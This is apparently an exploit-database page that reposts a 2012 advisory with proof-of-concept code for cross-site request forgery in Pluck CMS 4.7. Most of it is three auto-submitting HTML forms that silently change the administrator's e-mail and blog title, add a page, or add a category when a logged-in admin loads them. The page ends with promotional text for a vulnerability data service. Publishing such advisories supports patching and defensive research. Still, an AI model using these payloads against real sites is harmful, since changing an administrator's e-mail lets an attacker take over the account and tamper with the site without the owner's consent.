Lucene search
K

Pluck cms v4.7 CSRF Vulnerability

🗓️ 09 Feb 2012 00:00:00Reported by Gordon SecurityType 
zdt
 zdt
🔗 0day.today👁 15 Views

Pluck cms v4.7 CSRF Vulnerability, Multiple exploits to change admin e-mail, add page, and add categorie

Code
# Exploit Title: Pluck cms multiple vulnerabilità
# Date: 09/01/2012
# Author: Gordon Security
# Vendor or Software Link: www.pluck-cms.org
# Version: 4.7
# Category: webapps
# Website:www.gordon-security.blogspot.com

C.S.R.F. #1

#Grazie a questo P.o.c. possiamo cambiare far cambiare l'e-mail dell'Administrator e il titolo del blog
<html>
<title>Gordon Security</title>
<body onload="javascript:document.forms[0].submit()">
<H3>www.gordon-security.blogspot.com</H3>
<H2>CSRF Exploit to change Admin E-mail and Blog Title</H2>
<form method="POST" name="form0" action="http://127.0.0.1:80/pluck/admin.php?action=settings">
<input type="hidden" name="cont1" value="Gordon Security"/>
<input type="hidden" name="cont2" value="[email protected]"/>
<input type="hidden" name="save" value="Salva"/>
</form>
</body>
</html>

C.S.R.F. #2
#Tramite questo p.o.c. noi possiamo aggiungere pagine al blog
<html>
<title>Gordon Security</title>
<body onload="javascript:document.forms[0].submit()">
<H3>www.gordon-security.blogspot.com</H3>
<H2>CSRF Exploit to add page</H2>
<form method="POST" name="form0" action="http://127.0.0.1:80/pluck/admin.php?action=editpage">
<input type="hidden" name="title" value="Exploit"/>
<input type="hidden" name="content" value="<p>Exploited</p>"/>
<input type="hidden" name="description" value=""/>
<input type="hidden" name="keywords" value=""/>
<input type="hidden" name="hidden" value="no"/>
<input type="hidden" name="sub_page" value=""/>
<input type="hidden" name="theme" value="default"/>
<input type="hidden" name="save_exit" value="Save and Exit"/>
</form>
</body>
</html>

C.S.R.F #3

#Con questo p.o.c. noi possiamo aggiungere categorie al blog
<html>
<title>Gordon Security</title>
<body onload="javascript:document.forms[0].submit()">
<H3>www.gordon-security.blogspot.com</H3>
<H2>CSRF Exploit to add categorie</H2>
<form method="POST" name="form0" action="http://127.0.0.1:80/pluck/admin.php?module=blog">
<input type="hidden" name="cont1" value="Hacking"/>
<input type="hidden" name="Submit" value="Salva"/>
</form>
</body>
</html>



#  0day.today [2018-04-11]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation